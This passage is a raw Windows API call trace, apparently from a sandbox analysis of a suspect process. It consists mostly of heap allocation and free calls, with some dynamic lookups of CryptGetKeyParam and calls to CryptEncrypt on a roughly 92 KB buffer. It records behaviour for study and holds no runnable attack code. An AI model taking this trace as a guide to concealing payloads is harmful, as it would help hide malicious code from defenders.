(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0090.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0090.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0090.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0090.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0090.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0090.393] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0090.393] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0090.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0090.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0090.393] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0090.393] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0090.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0090.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0090.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0090.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0090.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0090.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0090.478] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0090.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0090.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0090.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0090.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0090.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0090.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0090.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0090.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0090.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0090.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0090.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0090.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0090.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0090.479] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0090.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0090.479] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0090.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0090.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0090.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0090.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e28 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0090.480] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0090.480] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0090.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0090.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0090.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0090.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0090.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0090.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0090.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0090.481] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0090.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0090.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0090.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0090.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0090.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0090.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0090.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0090.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.481] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0090.482] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0090.482] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0090.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0090.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0090.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0090.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0090.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0090.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0090.483] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1797008, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0090.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0090.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0090.483] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0090.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0090.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0090.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0090.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.483] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0090.484] CryptGetKeyParam (in: hKey=0x41ac600, dwParam=0x7, pbData=0x43e2540, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2540*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0090.484] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0090.485] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0090.486] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0090.486] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0090.487] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0090.487] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0090.487] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0090.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0090.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0090.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac140 | out: hHeap=0x1780000) returned 1 [0090.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0090.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0090.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0090.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0090.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0090.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0090.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0090.488] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0090.488] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0090.488] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0090.488] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0090.599] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.601] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca778, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.602] CryptEncrypt (in: hKey=0x41ac600, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x167bc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x167c0) returned 1 [0090.602] CharLowerBuffW (in: lpsz="byte[92097]", cchLength=0xb | out: lpsz="byte[92097]") returned 0xb [0090.604] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0090.604] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca8c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 